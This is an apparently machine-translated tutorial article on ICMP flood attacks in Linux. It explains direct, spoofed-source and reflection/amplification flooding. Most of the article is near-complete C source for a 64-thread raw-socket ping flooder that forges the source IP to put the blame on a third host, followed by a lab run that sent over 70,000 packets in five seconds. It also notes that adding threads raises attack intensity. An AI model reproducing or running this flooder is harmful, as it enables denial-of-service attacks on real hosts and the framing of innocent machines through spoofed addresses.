Linux--Instance introduction of ICMP flood attack

This article mainly introduces the relevant information of ICMP flood attack in LinuxProgramming to everyone. It has certain reference value. Interested friends can refer to it

me In the previous article "Implementation of PING in Linux Programming", the ICMP protocol was used to implement the PING program. In addition to implementing such a PING program, what other unknown or interesting uses does ICMP have? Here I will introduce another well-known black technology of ICMP: ICMP flood attack.

ICMP flood attack is a type of the famous DOS (Denial of Service) attack, which is a favorite attack method of hackers. In order to deepen my understanding of ICMP, I also try I am writing an ICMP flood attack applet based on ICMP.

FLOOD ATTACK refers to a network that uses computer network technology to send a large number of useless data packets to the destination host, making the destination host busy processing useless data packets and unable to provide normal servicesBehavior.

ICMP flood attack: As the name suggests, it is to send a flood of ping packets to the destination host, making the destination host busy processing ping packets and unable to process other normal requests. This is like a flood of ping packets. The destination host was flooded.

To implement ICMP flood attack, the following three knowledge reserves are required:

• DOS attack principle

• In-depth understanding of ICMP

• Raw socket programming skills

##1. ICMP flood attack principle

ICMP flood attacks are formed based on ping, but the ping program rarely causes problems and downtime. This is because the rate at which ping sends packets is too slow, like In the PING program I implemented, the ping packet sending rate is limited to 1 packet per second. This rate is more than enough for the destination host to process ping packets. Therefore, in order to cause a "flood" phenomenon, the contract issuance rate must be increased. Here are three ICMP flood attack methods:

(1) Direct flood attack

This requires a competition between the bandwidth of the local host and the bandwidth of the destination host. , for example, my host network bandwidth is 30M, and your host network bandwidth is only 3M, then the success rate of my launching a flood attack to submerge your host is very high. This attack method requires that the processing power and bandwidth of the attacking host are greater than that of the attacked host, otherwise it will be DoSed. Based on this idea, we can use a high-bandwidth and high-performance computer to send multiple ICMP request messages at once using a multi-threading method, so that the destination host is busy processing a large number of these messages, resulting in slow speed or even downtime. This method has a big disadvantage, that is, the other party can block the source of the attack based on the IP address of the ICMP packet, so that the attack cannot continue.

(2) Fake IP attack

Based on the direct flood attack, we disguise the sender’s IP address as another IP. If it is disguised as a random IP, you can hide your location very well; if you disguise your IP as the IP of other victims, it will cause a situation of "stoking discord", and the icmp reply packets of victim host 1 will also be sent like a flood to Victim Host 2, if the administrator of Host 1 wants to find out which bastard sent the packet to attack him, he checks the source address of the ICMP packet, and it turns out to be Host 2. In this way, Host 2 becomes the scapegoat.

(3) Reflection attack

The idea of ​​this type of attack is different from the above two attacks, and the design of reflection attack is more clever. In fact, the attack mode of method three here is a merged and upgraded version of the first two modes. The attack strategy of method three is a bit like "killing with a borrowed knife". The reflection attack no longer directly targets the target host, but causes a group of other hosts to mistake it for the target host. After sending ICMP request packets to them, a group of hosts then send ICMP response packets to the destination host, causing flooding from all directions to flood the destination host. For example, we send ICMP request packets to other hosts on the LAN, and then disguise our own IP address as the IP of the destination host. In this way, the sub-destination host becomes the focus of the ICMP echo. This attack is very subtle because it is difficult for the victim host to find out who is the source of the attack.

2. ICMP Flood Attack Program Design

Here I want to implement an example of ICMP flood attack. Here I I want to use the second method to design. Although the third method of "killing with a borrowed knife" is more clever, it is actually a further extension of the disguise method of the second method, and the implementation is similar.

First give the

model of the attackPicture:

1. Group ICMP packet

The packet group here is not much different from the packet group when writing the PING program. The only thing that needs to be noted is that we need to fill in the IP header part because we want to disguise the source address and put the blame on others.

void DoS_icmp_pack(char* packet)
{
  struct ip* ip_hdr = (struct ip*)packet;
  struct icmp* icmp_hdr = (struct icmp*)(packet + sizeof(struct ip));

  ip_hdr->ip_v = 4;
  ip_hdr->ip_hl = 5;
  ip_hdr->ip_tos = 0;
  ip_hdr->ip_len = htons(ICMP_PACKET_SIZE);
  ip_hdr->ip_id = htons(getpid());
  ip_hdr->ip_off = 0;
  ip_hdr->ip_ttl = 64;
  ip_hdr->ip_p = PROTO_ICMP;
  ip_hdr->ip_sum = 0;
  ip_hdr->ip_src.s_addr = inet_addr(FAKE_IP);; //伪装源地址
  ip_hdr->ip_dst.s_addr = dest; //填入要攻击的目的主机地址

  icmp_hdr->icmp_type = ICMP_ECHO;
  icmp_hdr->icmp_code = 0;
  icmp_hdr->icmp_cksum = htons(~(ICMP_ECHO << 8));
  //注意这里，因为数据部分为0，我们就简化了一下checksum的计算了
}

2. Build a contract sending thread

void Dos_Attack()
{
  char* packet = (char*)malloc(ICMP_PACKET_SIZE);
  memset(packet, 0, ICMP_PACKET_SIZE);
  struct sockaddr_in to;
  DoS_icmp_pack(packet);

  to.sin_family = AF_INET;
  to.sin_addr.s_addr = dest;
  to.sin_port = htons(0);

  while(alive) //控制发包的全局变量
  {
    sendto(rawsock, packet, ICMP_PACKET_SIZE, 0, (struct sockaddr*)&to, sizeof(struct sockaddr));    
  }

  free(packet); //记得要释放内存
}

3. Write the packet sending switch

The switch here is very simple and can be realized by using semaphore + global variable. When we press ctrl+c, the attack will be turned off.

void Dos_Sig()
{
  alive = 0;
  printf("stop DoS Attack!\n");
}

4. Overall Architecture

We used 64 threads to send packets together. Of course, the number of threads can be greatly increased to increase the intensity of the attack. But we are just doing experiments, there is no need to make it so big.

int main(int argc, char* argv[])
{
  struct hostent* host = NULL;
  struct protoent* protocol = NULL;
  int i;
  alive = 1;
  pthread_t attack_thread[THREAD_MAX_NUM]; //开64个线程同时发包  
  int err = 0;

  if(argc < 2)
  {
    printf("Invalid input!\n");
    return -1;
  }

  signal(SIGINT, Dos_Sig);

  protocol = getprotobyname(PROTO_NAME);
  if(protocol == NULL)
  {
    printf("Fail to getprotobyname!\n");
    return -1;
  }

  PROTO_ICMP = protocol->p_proto;

  dest = inet_addr(argv[1]);

  if(dest == INADDR_NONE)
  {
    host = gethostbyname(argv[1]);
    if(host == NULL)
    {
      printf("Invalid IP or Domain name!\n");
      return -1;
    }
    memcpy((char*)&dest, host->h_addr, host->h_length);

  }

  rawsock = socket(AF_INET, SOCK_RAW, PROTO_ICMP);
  if(rawsock < 0)
  {
    printf("Fait to create socket!\n");
    return -1;
  }

  setsockopt(rawsock, SOL_IP, IP_HDRINCL, "1", sizeof("1"));

  printf("ICMP FLOOD ATTACK START\n");

  for(i=0;i<THREAD_MAX_NUM;i++)
  {
    err = pthread_create(&(attack_thread[i]), NULL, (void*)Dos_Attack, NULL);
    if(err)
    {
      printf("Fail to create thread, err %d, thread id : %d\n",err, attack_thread[i]);      
    }
  }

  for(i=0;i<THREAD_MAX_NUM;i++)
  {
    pthread_join(attack_thread[i], NULL);  //等待线程结束
  }

  printf("ICMP ATTACK FINISHI!\n");

  close(rawsock);

  return 0;
}

3. Experiment

This experiment is for the purpose of learning. I want to use my own hands to I want to further understand the application of the network and protocols, so the scope of the attack is relatively small, it only lasts a few seconds, and it does not affect any equipment.

Let’s talk about our attack steps again: We use host 172.0.5.183 as our attack host, disguise ourselves as host 172.0.5.182, and launch an ICMP flood attack on host 172.0.5.9.

The attack begins

Let’s observe the situation on the “victim” side. In just 5 seconds, more than 70,000 packets were correctly received and delivered to the upper layer for processing. I don't dare to do too much to avoid affecting the work of the machine.

Use wireshark to capture the packets and take another look. They are full of ICMP packets, which seems to be quite large. The source address of the ICMP packet is shown as 172.0.5.182 (our spoofed address), and it also sends an echo reply back to 172.0.5.182. The host 172.0.5.182 will definitely think that it is inexplicable why it received so many echo reply packets.

The attack experiment is completed.

What is more popular now is the DDOS attack, which is more powerful, has more sophisticated strategies, and is more difficult to defend.
In fact, this kind of DDoS attack is also launched on the basis of DOS. The specific steps are as follows:

1. The attacker broadcasts an echo request message to the "amplification network"
2. The attacker specifies the source IP of the broadcast message as the attacked host
3. "Zoom the network" and echo reply to the attacked host
4. Form a DDoS attack scenario

Here's " "Amplified network" can be understood as a network with many hosts whose operating systems need to support responding to certain ICMP request packets whose destination address is a broadcast address.

The attack strategy is very sophisticated. In short, it is to disguise the source address as the IP address of the attacking host, and then broadcast it to all hosts. After receiving the echo request, the hosts collectively send messages to the attacking host. Return the package, causing a group attack.

The above is the detailed content of Linux--Instance introduction of ICMP flood attack. For more information, please follow other related articles on the PHP Chinese website!